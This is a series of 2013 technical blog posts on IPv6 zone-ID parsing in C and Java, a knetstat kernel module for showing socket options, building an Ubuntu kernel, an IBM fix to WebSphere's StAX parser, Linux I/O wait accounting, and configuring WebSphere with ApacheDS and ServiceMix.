Monday, December 30, 2013

How to correctly parse IPv6 addresses (in C and Java)

I recently started to do some bug fixing in GNU Netcat. One of the things I worked on was better support for IPv6. In principle, IPv6 support was added to GNU Netcat quite some time ago on the trunk (aka 0.8-cvs), but it turned out that it doesn't really work. After fixing two obvious bugs (c8c0234, 714dcc5), I stumbled over another interesting issue.

One experiment I wanted to do with Netcat was to connect to another host over IPv6 using a link-local address. With IPv6, a link-local address is automatically assigned to each interface that has a MAC address (i.e. all Ethernet interfaces, but not the loopback interface). The IPv6 address is derived from the MAC address using the modified EUI-64 scheme (the universal/local bit of the first octet is flipped and the bytes ff:fe are inserted between the two halves of the MAC) and is unique because MAC addresses are unique. E.g. an interface with the MAC address 08:00:27:84:0b:e2 would get the following IPv6 address: fe80::a00:27ff:fe84:be2.
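
For illustration, the derivation can be reproduced in a few lines of Python (a sketch of the modified EUI-64 scheme, not code from Netcat):

```python
import ipaddress

def link_local_from_mac(mac):
    """Derive the IPv6 link-local address from a MAC address using the
    modified EUI-64 scheme: flip the universal/local bit of the first
    octet and insert ff:fe between the two halves of the MAC."""
    octets = [int(b, 16) for b in mac.split(":")]
    octets[0] ^= 0x02  # flip the universal/local bit
    eui64 = octets[:3] + [0xFF, 0xFE] + octets[3:]
    # Combine the 8 bytes into 4 hexadecimal 16-bit groups
    host = ":".join(f"{(eui64[i] << 8) | eui64[i + 1]:x}" for i in range(0, 8, 2))
    return ipaddress.IPv6Address("fe80::" + host).compressed

print(link_local_from_mac("08:00:27:84:0b:e2"))  # fe80::a00:27ff:fe84:be2
```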

The problem with link-local addresses is that because of the way they are defined, the routing code in the operating system has no clue which interface it has to use in order to send packets to such an address. Here is where zone IDs come into play. The zone ID (also called scope ID) is a new feature in IPv6 that has no equivalent in IPv4. Basically, in the case considered here, it identifies the interface through which packets have to be sent (but the concept is more general).

Together with the concept of zone ID, the IPv6 specification also introduced a distinct notation to represent an address with an associated zone ID:

<address>%<zone_id>
In the case considered here, the zone ID is simply the interface name (at least, that is how it works on Linux and Mac OS X). E.g. assuming that the remote host with MAC address 08:00:27:84:0b:e2 is attached to the same network as the eth0 interface on the local host, the complete address including the zone ID would be:

fe80::a00:27ff:fe84:be2%eth0
This address can indeed be used with programs such as SSH to connect to the remote host. Unfortunately that didn't work with GNU Netcat:

$ netcat -6 fe80::a00:27ff:fe84:be2%eth0 22
Error: Couldn't resolve host "fe80::a00:27ff:fe84:be2%eth0"

That raises the question of how to correctly parse host parameters (passed on the command line or read from a configuration file) such that IPv6 addresses with zone IDs are recognized. It turns out that Netcat was using the following strategy:

  1. Attempt to use inet_pton to parse the host parameter as an IPv4 or IPv6 address.
  2. If the host parameter is neither parsable as an IPv4 address nor an IPv6 address, assume that it is a host name and use gethostbyname to look up the corresponding address.

The problem with that strategy is that although inet_pton and gethostbyname both support IPv6 addresses, they don't understand zone IDs. That is to be expected because both functions produce an in6_addr structure, but the zone ID is part of the corresponding socket address structure sockaddr_in6.
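
This is easy to verify; for illustration, Python's socket.inet_pton is a thin wrapper around the same C function:

```python
import socket

# inet_pton produces a bare in6_addr (16 bytes), so the %zone syntax is rejected
addr = socket.inet_pton(socket.AF_INET6, "fe80::a00:27ff:fe84:be2")
try:
    socket.inet_pton(socket.AF_INET6, "fe80::a00:27ff:fe84:be2%eth0")
    zone_accepted = True
except OSError:  # raised for any string that is not a plain numeric address
    zone_accepted = False
print(len(addr), zone_accepted)  # 16 False
```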

To fully support IPv6, several enhancements have been introduced in the Unix socket APIs. In our context the getaddrinfo function is the most relevant one. It is able to parse IP addresses and to translate host names, but in contrast to inet_pton and gethostbyname it produces sockaddr_in6 (or sockaddr_in) structures and fully supports zone IDs.

As a conclusion, to write C code that supports all types of IP address including IPv6 addresses with zone IDs, use the following approach:

  1. Don't use inet_pton and gethostbyname; always use getaddrinfo.
  2. Don't assume that the information needed to connect to a remote host can be stored separately as a host address (in_addr or in6_addr) and a port number: that is true for IPv4, but not for IPv6. Instead, always use a socket address so that the zone ID can be stored as well. Obviously there are use cases where the host address and the port number need to be processed in different places in the code (consider e.g. a port scanner that takes a host address/name and a port range). In those cases you can still use getaddrinfo, but with a NULL value for the service argument; store the partially filled socket address and fill in the port number later.
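
To illustrate, Python's socket.getaddrinfo wraps the C function described above; the loopback interface lo is used here instead of eth0 so the snippet is self-contained:

```python
import socket

# getaddrinfo understands the %zone notation; for AF_INET6 the returned
# socket address is a (host, port, flowinfo, scope_id) tuple, i.e. the
# equivalent of a fully populated sockaddr_in6
infos = socket.getaddrinfo("fe80::1%lo", 22, socket.AF_INET6,
                           socket.SOCK_STREAM, 0, socket.AI_NUMERICHOST)
host, port, flowinfo, scope_id = infos[0][4]
print(port, scope_id)  # the zone ID has been resolved to an interface index
```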

Unfortunately, fixing existing code to respect those guidelines may require some extensive changes.

Interestingly, things are much easier and more natural in Java. Java considers the zone ID to be part of the host address (an Inet6Address instance in this case), so that the socket address (InetSocketAddress) simply comprises a host address and a port number, exactly as in IPv4. This means that any code that uses the standard InetAddress.getByName method to parse an IP address will automatically support IPv6 addresses with zone IDs. Note that this is true even for code not specifically written with IPv6 support in mind (and even for code written before IPv6 support was introduced in Java 1.4), unless of course the code casts the returned InetAddress to an Inet4Address, or is not prepared to encounter a : in the host address, e.g. because it uses : as the separator between the host address and the port number.

Thursday, December 19, 2013

Inspecting socket options on Linux

The other day the question came up whether on Linux it is possible to determine the socket options for a TCP socket created by some running process. The lsof command actually has an option for that (-T f), but it is not supported on Linux. The reason is that socket options are not exposed via the /proc filesystem. This means that the only way to do this is using strace, ltrace or similar tools. This is problematic because they require some special setup and/or produce large amounts of data that one needs to analyze in order to get the desired information. Moreover, since they trace the invocation of the setsockopt syscall, they have to be used at socket creation time and are useless if one needs to determine the options set on an already created socket.

In some cases, it is possible to determine the setting of a particular socket option indirectly. E.g. the netstat -to command makes it possible to determine whether SO_KEEPALIVE is enabled on the socket for an established TCP connection: the -o option displays the currently active timer for each socket, and for established TCP connections with SO_KEEPALIVE set, this will be the keepalive timer. Obviously this is not a general solution, since it only works for a small subset of all socket options.
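
Note that for a socket owned by the current process this is trivial with getsockopt; the difficulty discussed here is doing the same for sockets belonging to other processes. A minimal illustration (Python, whose socket module wraps the same system calls):

```python
import socket

# A process can always query options on its own sockets via getsockopt
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.setsockopt(socket.SOL_SOCKET, socket.SO_KEEPALIVE, 1)
ka = s.getsockopt(socket.SOL_SOCKET, socket.SO_KEEPALIVE)
print(ka)  # non-zero: SO_KEEPALIVE is enabled on this socket
s.close()
```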

To solve that issue, my original plan was to patch the Linux kernel to add the necessary information to the relevant files in /proc/net (tcp, tcp6, udp, udp6, etc.). However, it turned out that this is not a trivial change (such as adding a format specifier and argument to a printf call):

  • The files in /proc/net are not meant to be human readable; they define an interface between the kernel and user space tools. This means that before adding information about socket options, one first has to carefully define the format in which this information is presented.
  • The code that formats the entries in the various files in /proc/net is scattered over multiple files and partially duplicated (see e.g. tcp4_seq_show in net/ipv4/tcp_ipv4.c and tcp6_seq_show in net/ipv6/tcp_ipv6.c, as well as the functions called by these two functions).

That's why I finally settled on another idea, namely to write a kernel module that adds new files with the desired information to /proc/net. These files would be human readable (with a format similar to the output of the netstat command), so that one has more flexibility with respect to the presentation of the information in these files.

Fortunately the TCP/IP stack in Linux exports just enough of the relevant functions to enable reusing part of the code that generates the /proc/net/tcp and /proc/net/tcp6 files, making it fairly easy to implement such a kernel module. The source code for the module is available as a project on GitHub called knetstat. After building and loading the knetstat module, two new files appear in /proc/net:

$ cat /proc/net/tcpstat
Proto Recv-Q Send-Q Local Address           Foreign Address         State       Options
tcp        0      0*               LISTEN      SO_REUSEADDR=1,SO_KEEPALIVE=0
tcp        0      0*               LISTEN      SO_REUSEADDR=1,SO_KEEPALIVE=0
tcp        0      0    *               LISTEN      SO_REUSEADDR=1,SO_KEEPALIVE=0
tcp        0      0         ESTABLISHED SO_REUSEADDR=1,SO_KEEPALIVE=0
tcp        0      0          ESTABLISHED SO_REUSEADDR=0,SO_KEEPALIVE=1
tcp        0      0       ESTABLISHED SO_REUSEADDR=1,SO_KEEPALIVE=1
tcp        0      0       ESTABLISHED SO_REUSEADDR=1,SO_KEEPALIVE=1
$ cat /proc/net/tcp6stat
Proto Recv-Q Send-Q Local Address           Foreign Address         State       Options
tcp6       0      0 ::1:6010                :::*                    LISTEN      SO_REUSEADDR=1,SO_KEEPALIVE=0
tcp6       0      0 ::1:6011                :::*                    LISTEN      SO_REUSEADDR=1,SO_KEEPALIVE=0
tcp6       0      0 :::22                   :::*                    LISTEN      SO_REUSEADDR=1,SO_KEEPALIVE=0

As implied by the name of the module, the format is indeed similar to the output of netstat, except of course for the last column with the socket options:

$ netstat -tan
Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address           Foreign Address         State      
tcp        0      0*               LISTEN     
tcp        0      0*               LISTEN     
tcp        0      0    *               LISTEN     
tcp        0      0         ESTABLISHED
tcp        0      0          ESTABLISHED
tcp        0      0       ESTABLISHED
tcp        0      0       ESTABLISHED
tcp6       0      0 ::1:6010                :::*                    LISTEN     
tcp6       0      0 ::1:6011                :::*                    LISTEN     
tcp6       0      0 :::22                   :::*                    LISTEN     

Note that at the time of writing, knetstat only supports a small set of socket options and lacks support for socket types other than TCP. Check the project's README for the current list of supported features.

Building and installing a vanilla Linux kernel on Ubuntu

This post describes a simple procedure to build and install a new Linux kernel on Ubuntu using the official source code from the kernel developers' Git repository. The aim is to produce a kernel that can be used as a drop-in replacement of the kernels shipped by Ubuntu and that neatly fits into the distribution. The procedure was tested with Linux 3.12 on Ubuntu 13.10.

  1. Ensure that you have enough free disk space. Building the kernel using the present procedure may require up to 13 GB (!) of storage.

  2. Install the necessary build tools:

    sudo apt-get install kernel-package git
  3. Download the kernel sources:

    git clone git://
  4. Check out the tag or branch for the kernel version you want to build. For example:

    cd linux
    git checkout v3.12
  5. Copy the configuration of the Ubuntu kernel. For the currently running kernel, use the following command:

    cp /boot/config-$(uname -r) .config
  6. Initialize new configuration options to their default values (See here for an explanation):

    yes "" | make oldconfig
  7. Use make-kpkg to compile the kernel and create Debian packages. You may want to use --append-to-version to add something to the version number, e.g. if you intend to apply patches to the kernel:

    fakeroot make-kpkg --initrd --append-to-version=-patched kernel-image kernel-headers
  8. Go back to the parent directory and install the generated packages using dpkg -i. This should take care of creating the initial ramdisk and configuring the boot loader. You can now reboot your system to load the new kernel.

Monday, December 9, 2013

Broken by design: WebSphere's default StAX implementation (part 2)

A few weeks ago I posted an article describing a vulnerability in WebSphere's default StAX implementation (XLXP 2). In the meantime, IBM has acknowledged that the problem I described indeed causes a security issue and has produced a fix (see APAR PM99450). That fix introduces a new system property, described as follows:

The value of the property is a non-negative integer which determines the minimum number of bytes (as a percentage) that will be loaded into each buffer. The percentage is calculated with the following formula: 1/2^n.

When the system property is not set its default value is 3. Setting the property to a lower value than the default can improve memory usage but may also reduce throughput.
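
So with the default value of 3, the minimum fill level works out to 1/2^3 = 12.5% of the buffer size:

```python
n = 3  # default value of the new system property
min_fill_fraction = 1 / 2 ** n
print(min_fill_fraction)  # 0.125, i.e. 12.5% of each buffer must be filled
```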

In the last sentence IBM makes an interesting statement that raises some questions. Why would a change enabling the parser to read data into an already reserved and partially filled buffer potentially cause a reduction in throughput? To answer that question, one has to understand how IBM actually implemented that feature. Fortunately this doesn't require access to the source code. It is enough to carefully examine the visible behavior of the parser, namely by feeding it with an InputStream that returns data in small chunks and determining the correlation between read operations on that InputStream and events produced by the parser.

This reveals that the parser now uses the following algorithm: if after a first read operation the fill level determined by the new system property is not reached, a second read request is issued immediately, and this is repeated until the required fill level has been reached. The implication is that the parser may need to read much more data than is necessary to produce the next event. Stated differently, a call requesting the next event may block even if enough data is already available in the input stream.
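
The observed behavior suggests refill logic along these lines (a reconstruction from black-box observation, not IBM's actual code; all names are invented):

```python
def fill_buffer(read_chunk, buf_size, n):
    """Keep issuing reads until the buffer holds at least buf_size / 2**n
    bytes (or the stream is exhausted). Returns the total bytes buffered."""
    threshold = buf_size >> n  # minimum fill level implied by the property
    filled = 0
    while filled < threshold:
        chunk = read_chunk()
        if not chunk:
            break  # end of stream
        filled += len(chunk)
    return filled

# A stream that yields 10 bytes per read: the parser keeps issuing reads
# until the 4096 >> 3 = 512 byte threshold is crossed, even though a
# single chunk might already contain the next event.
filled = fill_buffer(lambda: b"x" * 10, 4096, 3)
print(filled)  # 520, the first multiple of 10 >= 512
```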

As a matter of fact, this may have an impact on performance. Consider e.g. the processing of a SOAP message. With a well designed StAX implementation, the SOAP stack will be able to start processing the SOAP header before the SOAP body has been received completely. That is because a StAX implementation is expected to return an event as soon as enough data is available from the underlying input stream. E.g. if the next event is START_ELEMENT, then the call requesting that event should return as soon as the start tag for that element has been read from the stream. With the change introduced by PM99450, that assumption no longer holds for XLXP 2.

Monday, November 18, 2013

The precise meaning of I/O wait time in Linux

Some time ago I had a discussion with some systems guys about the exact meaning of the I/O wait time which is displayed by top as a percentage of total CPU time. Their answer was that it is the time spent by the CPU(s) while waiting for outstanding I/O operations to complete. Indeed, the man page for the top command defines this as the "time waiting for I/O completion".

However, this definition is obviously not correct (or at least not complete), because a CPU never spends clock cycles waiting for an I/O operation to complete. Instead, if a task running on a given CPU blocks on a synchronous I/O operation, the kernel will suspend that task and allow other tasks to be scheduled on that CPU.

So what is the exact definition then? There is an interesting Server Fault question that discussed this. Somebody came up with the following definition that describes I/O wait time as a sub-category of idle time:

iowait is time that the processor/processors are waiting (i.e. is in an idle state and does nothing), during which there in fact was outstanding disk I/O requests.

That makes perfect sense for uniprocessor systems, but there is still a problem with that definition when applied to multiprocessor systems. In fact, "idle" is a state of a CPU, while "waiting for I/O completion" is a state of a task. However, as pointed out earlier, a task waiting for outstanding I/O operations is not running on any CPU. So how can the I/O wait time be accounted for on a per-CPU basis?

For example, let's assume that on an otherwise idle system with 4 CPUs, a single, completely I/O bound task is running. Will the overall I/O wait time be 100% or 25%? I.e. will the I/O wait time be reported as 100% on a single CPU (and 0% on the others), or as 25% on each of the 4 CPUs? This can easily be checked with a simple experiment. One can simulate an I/O bound process using the following command, which simply reads data from the hard disk as fast as it can:

dd if=/dev/sda of=/dev/null bs=1MB

Note that you need to execute this as root and if necessary change the input file to the appropriate block device for your hard disk.

Looking at the CPU stats in top (press 1 to get per-CPU statistics), you will see something like this:

%Cpu0  :  3,1 us, 10,7 sy,  0,0 ni,  3,5 id, 82,4 wa,  0,0 hi,  0,3 si,  0,0 st
%Cpu1  :  3,6 us,  2,0 sy,  0,0 ni, 90,7 id,  3,3 wa,  0,0 hi,  0,3 si,  0,0 st
%Cpu2  :  1,0 us,  0,3 sy,  0,0 ni, 96,3 id,  2,3 wa,  0,0 hi,  0,0 si,  0,0 st
%Cpu3  :  3,0 us,  0,3 sy,  0,0 ni, 96,3 id,  0,3 wa,  0,0 hi,  0,0 si,  0,0 st

This clearly indicates that a single I/O bound task only increases the I/O wait time on a single CPU. Note that you may see that occasionally the task "switches" from one CPU to another. That is because the Linux kernel tries to schedule a task on the CPU it ran last (in order to improve CPU cache hit rates). The taskset command can be used to "pin" a process to a given CPU so that the experiment becomes more reproducible (Note that the first command line argument is not the CPU number, but a mask):

taskset 1 dd if=/dev/sda of=/dev/null bs=1MB
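
Since the argument is a bitmask, CPU n corresponds to the mask 1 << n (so CPU 0 is mask 1, and pinning to CPU 2 would require mask 4):

```python
def cpu_mask(cpu):
    """Affinity bitmask selecting a single CPU, as expected by taskset."""
    return 1 << cpu

print(hex(cpu_mask(0)), hex(cpu_mask(2)))  # 0x1 0x4
```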

Another interesting experiment is to run a CPU bound task at the same time on the same CPU:

taskset 1 sh -c "while true; do true; done"

The I/O wait time now drops to 0 on that CPU (and also remains 0 on the other CPUs), while user and system time account for 100% CPU usage:

%Cpu0  : 80,3 us, 15,5 sy,  0,0 ni,  0,0 id,  0,0 wa,  0,0 hi,  4,3 si,  0,0 st
%Cpu1  :  4,7 us,  3,4 sy,  0,0 ni, 91,3 id,  0,0 wa,  0,0 hi,  0,7 si,  0,0 st
%Cpu2  :  2,3 us,  0,3 sy,  0,0 ni, 97,3 id,  0,0 wa,  0,0 hi,  0,0 si,  0,0 st
%Cpu3  :  2,7 us,  4,3 sy,  0,0 ni, 93,0 id,  0,0 wa,  0,0 hi,  0,0 si,  0,0 st

That is expected because I/O wait time is a sub-category of idle time, and the CPU to which we pinned both tasks is never idle.

These findings allow us to deduce the exact definition of I/O wait time:

For a given CPU, the I/O wait time is the time during which that CPU was idle (i.e. didn't execute any tasks) and there was at least one outstanding disk I/O operation requested by a task scheduled on that CPU (at the time it generated that I/O request).

Note that the nuance is not innocent and has practical consequences. For example, on a system with many CPUs, even if there is a problem with I/O performance, the observed overall I/O wait time may still be small if the problem only affects a single task. It also means that while it is generally correct to say that faster CPUs tend to increase I/O wait time (simply because a faster CPU tends to be idle more often), that statement is no longer true if one replaces "faster" by "more".
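
As an aside, the cumulative per-CPU counters from which top computes these percentages come from /proc/stat; extracting the iowait counter is straightforward (field layout as documented in proc(5); the sample values below are made up):

```python
def iowait_ticks(stat_line):
    """Extract the iowait counter from a /proc/stat CPU line.
    Field order: label user nice system idle iowait irq softirq steal ..."""
    fields = stat_line.split()
    return int(fields[5])  # iowait is the 5th counter after the cpu label

# A line in the format written by the kernel (values invented for the example):
sample = "cpu0 4705 356 584 3699176 23719 713 83 0 0 0"
print(iowait_ticks(sample))  # 23719
```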

Saturday, November 16, 2013

WebSphere & ApacheDS quick setup guide

This article explains how to quickly configure WebSphere with Apache Directory Server (ApacheDS) for LDAP authentication. We will use the ApacheDS server that comes packaged with Apache Directory Studio. This has the advantage that we only need a single tool to set up the LDAP server and to populate the directory. Obviously the setup described here is not meant for production use; the goal is to rapidly create a working LDAP configuration for testing purposes. It is assumed that the reader is familiar with configuring security (and in particular standalone LDAP registries) in WebSphere. No prior experience with ApacheDS is required.

Start by setting up the LDAP server:

  1. Download, install and start Apache Directory Studio. The present article is based on version 2.0.0-M8, but the procedure should be similar for other versions.

  2. Using the "Servers" view, create a new ApacheDS server. There is no need to change the configuration; the default settings are appropriate for a test server. After the server has been created, start it.

  3. Create a connection to the server. To do this, right click on the server and choose "Create a Connection". The new connection should then appear in the "Connections" view. Double click on the connection to open it. You should see the following entries in the "LDAP Browser" view: dc=example,dc=com, ou=config, ou=schema and ou=system.

  4. Create two entries with RDN ou=users and ou=groups under dc=example,dc=com, both with object class organizationalUnit.

  5. For each test user, create an entry with object class inetOrgPerson under ou=users. For the RDN, use uid=<username>. Then fill in the cn and sn attributes (cn is the common name which should be the given name plus surname; sn is the surname alone). Also add a userPassword attribute.

  6. Under ou=groups, create as many groups as needed. There should be at least one group that will be mapped to the administrator role in WebSphere. For the object class, one can use either groupOfNames or groupOfUniqueNames. They are more or less the same, but the former is easier to set up, because Directory Studio will allow you to select members by browsing the directory. For the RDN, use cn=<groupname>. When using groupOfNames, Directory Studio will automatically open a dialog to select the first member of the group. Additional members can be defined by adding more values to the member attribute.

  7. Also define a uid=admin user that will be used as the primary administrative user in the WebSphere configuration. Since this is not a person, but a technical account, you can use the object classes account and simpleSecurityObject to create this user. Note that the uid=admin user doesn't need to be a member of any group.

The resulting LDAP tree should now contain the user and group entries under ou=users and ou=groups, both beneath dc=example,dc=com.

You can now configure the standalone LDAP registry in WebSphere. The settings are as follows:

  • Primary administrative user name: admin
  • Type of LDAP server: Custom
  • Host/port: localhost:10389 (if you kept the default configuration for ApacheDS, and the server is running on the same host)
  • Base distinguished name: dc=example,dc=com

You also need to specify the following properties in the advanced LDAP user registry settings:

  • User filter: (&(uid=%v)(|(objectclass=inetOrgPerson)(objectclass=account)))
  • Group filter: (&(cn=%v)(|(objectclass=groupOfNames)(objectclass=groupOfUniqueNames)))
  • User ID map: *:uid
  • Group ID map: *:cn
  • Group member ID map: groupOfNames:member;groupOfUniqueNames:uniqueMember

Monday, November 11, 2013

Deploying the WebSphere EJB thin client in ServiceMix

In a previous post I explained how to install the SIB thin client into ServiceMix and use it in a Camel route. In that post I used the JmsFactoryFactory API to create the JMS connection factory and the Queue object. However, it should also be possible to configure them in WebSphere and look them up using JNDI. Performing that JNDI lookup requires two additional libraries:

  • The EJB thin client
  • The IBM ORB (Object Request Broker)

Both JARs can be found in the runtimes directory in the WebSphere installation. The latter is required only on non-IBM JREs. In the following I will make the assumption that ServiceMix is running on an Oracle JRE and that we need both JARs.

In a Java SE environment it is relatively straightforward to create a Camel configuration that uses the EJB thin client to look up the necessary JMS resources from WebSphere. Here is a sample configuration that is basically equivalent to the one used in the earlier post:

<beans xmlns="http://www.springframework.org/schema/beans"
       xmlns:camel="http://camel.apache.org/schema/spring"
       xmlns:jee="http://www.springframework.org/schema/jee"
       xmlns:util="http://www.springframework.org/schema/util">

  <camel:camelContext>
    <camel:route>
      <camel:from uri="file://test"/>
      <camel:to uri="sib:queue:jms/testQ"/>
    </camel:route>
  </camel:camelContext>

  <bean id="sib" class="org.apache.camel.component.jms.JmsComponent">
    <property name="connectionFactory">
      <jee:jndi-lookup resource-ref="false" jndi-name="jms/testQCF" environment-ref="env"
                       lookup-on-startup="false" expected-type="javax.jms.QueueConnectionFactory"/>
    </property>
    <property name="destinationResolver">
      <bean class="org.springframework.jms.support.destination.JndiDestinationResolver">
        <property name="jndiEnvironment" ref="env"/>
      </bean>
    </property>
  </bean>

  <util:properties id="env">
    <prop key="java.naming.factory.initial">com.ibm.websphere.naming.WsnInitialContextFactory</prop>
    <prop key="java.naming.provider.url">corbaloc:iiop:isis:2809</prop>
  </util:properties>

</beans>

The only requirements are:

  • The three JARs (the SIB thin client, the EJB thin client and the ORB) must be in the classpath.
  • A queue (jms/testQ) and a connection factory (jms/testQCF) must be configured in WebSphere. The provider endpoints must be set manually in the connection factory configuration. If you are using an existing connection factory, remember that specifying the provider endpoints is not required for applications running on WebSphere. Therefore it is possible (and even likely) that they are not set.
  • The provider URL must point to the BOOTSTRAP_ADDRESS of the application server. If the JNDI resources are configured on a WebSphere cluster, use a corbaloc URL with multiple IIOP endpoints.

The challenge is now to make that configuration work on ServiceMix. We will make the following assumptions:

  • The ServiceMix version is 4.5.3.
  • We will use the libraries from WAS 8.5.5.
  • The SIB thin client has already been deployed on ServiceMix using the instructions in my earlier post.

The remaining task is then to deploy the EJB thin client and the ORB. The EJB thin client is actually already packaged as an OSGi bundle, while the ORB is packaged as a fragment that plugs into the EJB thin client. Therefore it should be enough to install these two artifacts into ServiceMix. However, it turns out that this is not as simple as one would expect.

Problem 1: Missing required bundle org.eclipse.osgi

The first problem that appears is that after installing the EJB thin client and the ORB, an attempt to start the EJB thin client bundle results in the following error:

org.osgi.framework.BundleException: Unresolved constraint in bundle [182]: Unable to resolve 182.0: missing requirement [182.0] module; (bundle-symbolic-name=org.eclipse.osgi)

Inspection of the manifests of these two artifacts indeed shows that they have the following directive:

Require-Bundle: org.eclipse.osgi

Obviously, IBM packaged these artifacts for the Equinox platform (which is also used by WebSphere itself). Because ServiceMix runs on Apache Felix, the bundle org.eclipse.osgi doesn't exist. Since the EJB thin client bundle has an activator, it is likely that the purpose of this directive is simply to satisfy the dependency on the org.osgi.framework package.

One possible solution for this problem would be to modify the manifests and replace the Require-Bundle directive by an equivalent Import-Package directive. However, there is another solution that doesn't require modifying the IBM artifacts. The idea is to create a "compatibility" bundle with the following manifest (and without any other content):

Manifest-Version: 1.0
Bundle-ManifestVersion: 2
Bundle-Name: Equinox compatibility bundle
Bundle-SymbolicName: org.eclipse.osgi
Bundle-Version: 0.0.0
Import-Package: org.osgi.framework
Export-Package: org.osgi.framework

The Export-Package directive makes the org.osgi.framework package available to the EJB thin client bundle. Since the compatibility bundle also imports that package, it will effectively be wired to the bundle that actually contains these classes (which must exist in any OSGi runtime because the org.osgi.framework package is part of the core OSGi API).
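
Such a bundle can be produced by simply zipping up the manifest, e.g. as follows (a sketch; the jar file name is arbitrary):

```python
import os
import tempfile
import zipfile

MANIFEST = """\
Manifest-Version: 1.0
Bundle-ManifestVersion: 2
Bundle-Name: Equinox compatibility bundle
Bundle-SymbolicName: org.eclipse.osgi
Bundle-Version: 0.0.0
Import-Package: org.osgi.framework
Export-Package: org.osgi.framework
"""

jar_path = os.path.join(tempfile.mkdtemp(), "org.eclipse.osgi-compat.jar")
with zipfile.ZipFile(jar_path, "w") as jar:
    # The manifest is the only content; OSGi reads META-INF/MANIFEST.MF
    jar.writestr("META-INF/MANIFEST.MF", MANIFEST)
print(jar_path)
```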

Problem 2: Constraint violation related to javax.transaction.xa

After installing the compatibility org.eclipse.osgi bundle, the EJB thin client bundle still fails to start. The error message is now:

org.osgi.framework.BundleException: Uses constraint violation. Unable to resolve module [182.0] because it exports package 'javax.transaction.xa' and is also exposed to it from module org.apache.aries.transaction.manager [58.0] via the following dependency chain: [182.0]
    import: (package=javax.jms)
    export: package=javax.jms; uses:=javax.transaction.xa
  org.apache.geronimo.specs.geronimo-jms_1.1_spec [48.0]
    import: (package=javax.transaction.xa)
    export: package=javax.transaction.xa
  org.apache.aries.transaction.manager [58.0]

Let's first decode what this actually means. The thin client bundle exports the javax.transaction.xa package, but it doesn't import it. That implies that it can't be wired to the javax.transaction.xa package exported by the Aries transaction manager bundle. At the same time the thin client imports the javax.jms package. The OSGi runtime chooses to wire that import to the Geronimo JMS API bundle. The javax.jms package contains classes that refer to classes in the javax.transaction.xa package as part of their public API (see e.g. XASession). That is expressed by the uses constraint (and a corresponding Import-Package directive) declared by the Geronimo bundle. However, the OSGi runtime cannot wire that import back to the thin client because this would cause a circular dependency; it has to wire it to the Aries bundle. That however would cause an issue because the thin client bundle would then "see" classes in the javax.transaction.xa package loaded from two different bundles (itself and the Aries bundle). Therefore the OSGi runtime refuses to resolve the thin client bundle.

That sounds like a tricky problem, but the solution is astonishingly simple: just remove the Geronimo JMS bundle!

osgi:uninstall geronimo-jms_1.1_spec

After that you should restart ServiceMix so that it can properly rewire all bundles.

To see why this works, let's first note that in ServiceMix, the javax.transaction.xa package is configured for boot delegation (see the org.osgi.framework.bootdelegation property in etc/config.properties). That means that classes in that package will always be loaded from the boot class loader, i.e. from the JRE. That in turn means that the issue detected by the OSGi runtime will actually never occur: no matter how imports and exports for javax.transaction.xa are formally wired together, it is always the classes from the JRE that are loaded. The uses:=javax.transaction.xa declaration in the Geronimo bundle is therefore effectively irrelevant and could be ignored.

Now recall that we made the assumption that the SIB thin client bundle is already installed. That bundle exports javax.jms as well, but since it also imports that package, this export will not be used as long as the Geronimo JMS bundle is installed. Let's have a closer look at the imports and exports of that bundle:

karaf@root> osgi:headers 181

IBM SIB JMS Thin Client (181)
Manifest-Version = 1.0
Specification-Title = sibc.client.thin.bundle
Eclipse-LazyStart = true
Specification-Version = 8.5.0
Specification-Vendor = IBM Corp.
Ant-Version = Apache Ant 1.8.2
Copyright = Licensed Materials - Property of IBM  5724-J08, 5724-I63, 5724-H88, 5724-H89, 5655-N02, 5733-W70  Copyright IBM Corp. 2007, 2009 All Rights Reserved.  US Government Users Restricted Rights - Use, duplication or disclosure restricted by GSA ADP Schedule Contract with IBM Corp.
Implementation-Version = WAS855.IM [gm1319.01]
Implementation-Vendor = IBM Corp.
Implementation-Title = sibc.client.thin.bundle
Created-By = pxi3260sr10-20111208_01 (SR10) (IBM Corporation)

Bundle-Vendor = IBM Corp.
Bundle-Localization = plugin
Bundle-RequiredExecutionEnvironment = J2SE-1.5
Bundle-Name = IBM SIB JMS Thin Client
Bundle-SymbolicName =; singleton:=true
Bundle-Classpath = .
Bundle-Version = 8.5.0
Bundle-ManifestVersion = 2

Import-Package = 
Export-Package =,,,
Require-Bundle = 

Interestingly, javax.transaction.xa isn't mentioned at all. Looking at the content of that bundle, one can also see that it doesn't contain that package either. This means that the SIB thin client was packaged with the assumption that javax.transaction.xa is configured for boot delegation (while the Geronimo JMS API bundle doesn't rely on that assumption). This is exactly what we need in our case. By removing the Geronimo bundle, we force the OSGi runtime to use the javax.jms package exported by the SIB thin client, and that solves the issue.

The EJB thin client indeed starts properly after doing that:

[ 181] [Active     ] [            ] [       ] [   80] IBM SIB JMS Thin Client (8.5.0)
[ 182] [Active     ] [            ] [       ] [   80] WebSphere EJB Thin Client Runtime (8.0.0)
                                       Fragments: 183
[ 183] [Resolved   ] [            ] [       ] [   80] WebSphere ORB Fragment (8.0.0)
                                       Hosts: 182
[ 185] [Active     ] [            ] [       ] [   80] Equinox compatibility bundle (0.0.0)

Problem 3: Inconsistent javax.resource.spi packages

We can now deploy the Spring configuration shown earlier. It deploys and starts successfully, but when trying to use it (by dropping a file into the test directory), an error occurs. The relevant part of the stack trace is as follows:

Exception occurred while the JNDI NamingManager was processing a javax.naming.Reference object. [Root exception is java.lang.NoClassDefFoundError: Ljavax/resource/spi/TransactionSupport$TransactionSupportLevel;]
  at javax.naming.InitialContext.lookup
  at org.springframework.jndi.JndiTemplate$1.doInContext
  at org.springframework.jndi.JndiTemplate.execute
  at org.springframework.jndi.JndiTemplate.lookup
  at org.springframework.jndi.JndiTemplate.lookup
  at org.springframework.jndi.JndiLocatorSupport.lookup
  at org.springframework.jndi.JndiObjectLocator.lookup
  at org.springframework.jndi.JndiObjectTargetSource.getTarget
  ... 50 more
Caused by: java.lang.NoClassDefFoundError: Ljavax/resource/spi/TransactionSupport$TransactionSupportLevel;
  at java.lang.Class.getDeclaredFields0
  at java.lang.Class.privateGetDeclaredFields
  at java.lang.Class.getDeclaredField
  at javax.naming.spi.NamingManager.getObjectInstance
  ... 67 more

